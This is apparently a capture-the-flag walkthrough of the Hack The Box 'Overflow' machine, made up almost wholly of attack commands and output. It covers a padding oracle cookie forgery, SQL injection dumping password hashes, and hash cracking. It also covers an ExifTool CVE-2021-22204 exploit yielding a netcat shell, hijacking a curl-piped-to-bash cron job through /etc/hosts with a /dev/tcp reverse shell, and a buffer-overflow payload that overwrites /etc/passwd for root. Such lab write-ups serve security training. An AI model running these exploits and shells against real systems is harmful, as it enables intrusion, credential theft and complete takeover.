# Enum directoires
`gobuster dir -u 'http://overflow.htb/' -w /usr/share/wordlists/dirb/common.txt -x html,php,dat,bak,txt -t 20`

```
/assets               (Status: 301) [Size: 313] [--> http://overflow.htb/assets/]
/config               (Status: 301) [Size: 313] [--> http://overflow.htb/config/]
/home                 (Status: 301) [Size: 311] [--> http://overflow.htb/home/]  
/index.php            (Status: 200) [Size: 12227]                                
/index.php            (Status: 200) [Size: 12227]                                
/login.php            (Status: 200) [Size: 1878]                                 
/logout.php           (Status: 302) [Size: 0] [--> index.php]                    
/register.php         (Status: 200) [Size: 2060]                                 
/server-status        (Status: 403) [Size: 277]
```

`gobuster dir -u 'http://overflow.htb/config' -w /usr/share/wordlists/dirb/common.txt -x html,php,dat,bak,txt -t 20`

```
/auth.php             (Status: 200) [Size: 0]  
/db.php               (Status: 200) [Size: 0]  
/users.php            (Status: 200) [Size: 0]
```

# Padding Oracle Attack
`padbuster http://overflow.htb/login.php 3jZkOPpHLk9RN03mehRHU3EHfGybvwsT 8 -cookies auth=3jZkOPpHLk9RN03mehRHU3EHfGybvwsT`

`padbuster http://overflow.htb/home/profile/ BTAv1%2FQAMEfK9vHSPu7EzkQKTqR5L0FC 8 -cookies auth=BTAv1%2FQAMEfK9vHSPu7EzkQKTqR5L0FC -plaintext "user=admin"`

# Modify cookie
`auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA`

# We can access CMS Made Simple
`http://overflow.htb/admin_cms_panel/admin/login.php`

# User Enumeration
`ffuf -c -ic -fw 1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 'http://overflow.htb/home/logs.php?name=FUZZ' -b 'auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAAw'`

```
admin                   [Status: 200, Size: 235, Words: 26, Lines: 1]
corp                    [Status: 200, Size: 47, Words: 6, Lines: 1]
editor                  [Status: 200, Size: 47, Words: 6, Lines: 1]
mark                    [Status: 200, Size: 47, Words: 6, Lines: 1]
Admin                   [Status: 200, Size: 235, Words: 26, Lines: 1]
super                   [Status: 200, Size: 47, Words: 6, Lines: 1]
tester                  [Status: 200, Size: 47, Words: 6, Lines: 1]
frost                   [Status: 200, Size: 47, Words: 6, Lines: 1]
diana                   [Status: 200, Size: 47, Words: 6, Lines: 1]
Editor                  [Status: 200, Size: 47, Words: 6, Lines: 1]
Super                   [Status: 200, Size: 47, Words: 6, Lines: 1]
Mark                    [Status: 200, Size: 47, Words: 6, Lines: 1]
Corp                    [Status: 200, Size: 47, Words: 6, Lines: 1]
CORP                    [Status: 200, Size: 47, Words: 6, Lines: 1]
```

# SQL INJECTION
`http://overflow.htb/home/logs.php?name=admin')+order+by+3--+-`

`http://overflow.htb/home/logs.php?name=admin')+union+select+1,2,version()--+-`

# SQLMAP to fast enum
`sqlmap -r req.txt -p name --dbms=mysql --dbs`

```
[*] cmsmsdb
[*] information_schema
[*] logs
[*] Overflow
```

`sqlmap -r req.txt -p name --dbms=mysql -D cmsmsdb -T cms_users -C email,password --dump`

```
+--------------------+----------------------------------+
| email              | password                         |
+--------------------+----------------------------------+
| admin@overflow.htb | c6c6b9310e0e6f3eb3ffeb2baff12fdd |
| <blank>            | e3d748d58b58657bfa4dffe2def0b1c7 |
+--------------------+----------------------------------+
```

`sqlmap -r req.txt -p name --dbms=mysql -D cmsmsdb -T cms_siteprefs -C sitepref_value,sitepref_name --dump`

```
6c2d17f37e226486 sitemask
```

# Cracking password

```
e3d748d58b58657bfa4dffe2def0b1c7:6c2d17f37e226486
```

`hashcat -m 20 hash.txt /usr/share/wordlists/rockyou.txt --force`

```
editor : alpha!@#$%bravo
```

# Read User tags
`http://overflow.htb/admin_cms_panel/admin/listusertags.php?__c=7d8d4f84c6c3f6ff194`

```
Important 	Make sure you check out devbuild-job.overflow.htb and report any UI related problems to devloper, use the editor account to authenticate.
```

# Add subdomain to hosts and login with the same creds
`nano /etc/hosts`

```
10.129.144.87   overflow.htb devbuild-job.overflow.htb
```

`http://devbuild-job.overflow.htb/home/index.php`

```
editor : alpha!@#$%bravo
```

# Clic on Image Profile and you can see Upload image File
`http://devbuild-job.overflow.htb/home/profile/index.php?id=1`

# We can see exiftool in the response when upload any image file
`http://devbuild-job.overflow.htb/home/profile/resume_upload.php`

# Exploit CVE-2021-22204
`python3 exploit.py`

# Upload image that exploit made and set listener
`nc -lvnp 1234`

```
┌──(root㉿kali)-[~/htb/Box/Linux/Overflow]
└─# nc -lvnp 1234          
listening on [any] 1234 ...
connect to [10.10.14.53] from (UNKNOWN) [10.129.144.87] 57792
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

# Read config files
`cat /var/www/html/admin_cms_panel/config.php`

```
$config['db_hostname'] = 'localhost';
$config['db_username'] = 'developer';
$config['db_password'] = 'sh@tim@n';
```

# Connect from ssh with the db_password
`ssh developer@10.129.144.87`

```
uid=1001(developer) gid=1001(developer) groups=1001(developer),1002(network)
```

# Run linpeas
`scp /opt/linux/linpeas.sh developer@10.129.144.87:/tmp`

`bash /tmp/linpeas.sh`

```
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls                                                                               
#file: /opt/file_encrypt                                                                                                                        
USER   root      rwx     
user   tester    r-x     
GROUP  root      ---     
mask             r-x     
other            ---     

#file: /opt/commontask.sh
USER   tester     rwx     
user   developer  r-x     
GROUP  tester     ---     
mask              r-x     
other             ---
```

# Inspect files
`cat /opt/commontask.sh`

```
#!/bin/bash

#make sure its running every minute.


bash < <(curl -s http://taskmanage.overflow.htb/task.sh)
```

# We can write in hosts file
`ls -la /etc/hosts`

```
-rwxrw-r-- 1 root network 201 Mar 11 05:20 /etc/hosts
```

# Modify hosts file with your ip and subdomain
`nano /etc/hosts`

```
127.0.0.1       localhost
127.0.1.1       overflow        overflow.htb
10.10.14.53     taskmanage.overflow.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
```

# Make task.sh in own machine with reverse shell
`nano task.sh`

```
bash -i >& /dev/tcp/10.10.14.53/4444 0>&1
```

# Set http server and listener and wait 1 minute
```
┌──(root㉿kali)-[~/htb/Box/Linux/Overflow]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.144.87 - - [10/Mar/2022 19:07:07] "GET /task.sh HTTP/1.1" 200 -
```

```
┌──(root㉿kali)-[~/htb/Box/Linux/Overflow]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.53] from (UNKNOWN) [10.129.144.87] 53530
bash: cannot set terminal process group (78088): Inappropriate ioctl for device
bash: no job control in this shell
tester@overflow:~$
```

# Make ssh connection
- `ssh-keygen`
- `cp id_rsa.pub authorized_keys`
- `chmod 600 authorized_keys`
- `cat id_rsa`
- `chmod 400 tester_id`
- `ssh -i tester_id tester@10.129.144.87`

# Download file_encrypt binary
```
┌──(root㉿kali)-[~/htb/Box/Linux/Overflow]
└─# nc -lvnp 5555 > file_encrypt
listening on [any] 5555 ...
connect to [10.10.14.53] from (UNKNOWN) [10.129.144.87] 57584
```

```
tester@overflow:/opt/file_encrypt$ nc -w 10 10.10.14.53 5555 < file_encrypt     
tester@overflow:/opt/file_encrypt$
```

# Reversing Get PIN Code
`python3 exploit.py`

```python
import ctypes

key = 0x6b8b4567
pin = 0x6b8b4567

for i in range(10):
    pin = pin * 0x59 + 0x14

pin = ctypes.c_int(pin ^ key).value
print(pin)
```

```
┌──(root㉿kali)-[~/htb/Box/Linux/Overflow]
└─# python3 exploit.py
-202976456
```

# Buffer Overflow
- `msf-pattern_create -l 100`
- `gdb ./file_encrypt`
- `run`

```
Program received signal SIGSEGV, Segmentation fault.
0x35624134 in ?? ()
```

`msf-pattern_offset -l 100 -q 0x35624134`

```
[*] Exact match at offset 44
```

`python3 -c "print('A'*44 + 'B' * 4)"`

```
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
```

`gdb ./file_encrypt`

```
(gdb) run
Starting program: /root/htb/Box/Linux/Overflow/file_encrypt 
This is the code 1804289383. Enter the Pin: -202976456
name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Thanks for checking. You can give your feedback for improvements at developer@overflow.htb

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
```

# Get address encrypt function

- `gdb ./file_encrypt`
- `run`
- `ctrl + c`
- `disassemble encrypt`

```
(gdb) run
Starting program: /root/htb/Box/Linux/Overflow/file_encrypt 
This is the code 1804289383. Enter the Pin: ^C
Program received signal SIGINT, Interrupt.
0xf7fc9559 in __kernel_vsyscall ()
(gdb) disassemble encrypt 
Dump of assembler code for function encrypt:
   0x5655585b <+0>:     push   %ebp
```

# Get string

`python3 pwn_file.py`

```
import struct

ret_add = 0x5655585b
offset = 44

payload = b'A' * offset
payload += struct.pack('<I',ret_add)
print(payload)
```

```
┌──(root㉿kali)-[~/htb/Box/Linux/Overflow]
└─# python3 pwn_file.py              
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[XUV'
```

# Copy passwd file

`cat /etc/passwd`

```
tester@overflow:/opt/file_encrypt$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
```

# Make passwd hash
```
┌──(root㉿kali)-[~/htb/Box/Linux/Overflow]
└─# openssl passwd -1 -salt doom doom    
$1$doom$m/meYVrO7ZsSmCo1/p4v..
```

```
┌──(root㉿kali)-[~/htb/Box/Linux/Overflow]
└─# tail -2 passwd
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
doom:$1$doom$m/meYVrO7ZsSmCo1/p4v..:0:0:doom:/root:/bin/bash
```

# Cipher new passwd

`python3 xor_root.py`

```
from pwn import *

rsa = open('passwd','rb').read()

new_rsa = xor(rsa, b'\x9b')

x = open('root_passwd','wb')
x.write(new_rsa)
x.close()
```

# Send passwd file

`python3 -m http.server 80`
`wget 10.10.14.53/root_passwd -O /tmp/passwd`

# Execute program

```
tester@overflow:/opt/file_encrypt$ ./file_encrypt 
This is the code 1804289383. Enter the Pin: -202976456
name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[XUV
Thanks for checking. You can give your feedback for improvements at developer@overflow.htb
Enter Input File: /tmp/passwd
Enter Encrypted File: /etc/passwd
Segmentation fault (core dumped)
```

```
tester@overflow:/opt/file_encrypt$ su doom
Password: 
root@overflow:/opt/file_encrypt# id
uid=0(root) gid=0(root) groups=0(root)
```

https://github.com/convisolabs/CVE-2021-22204-exiftool.git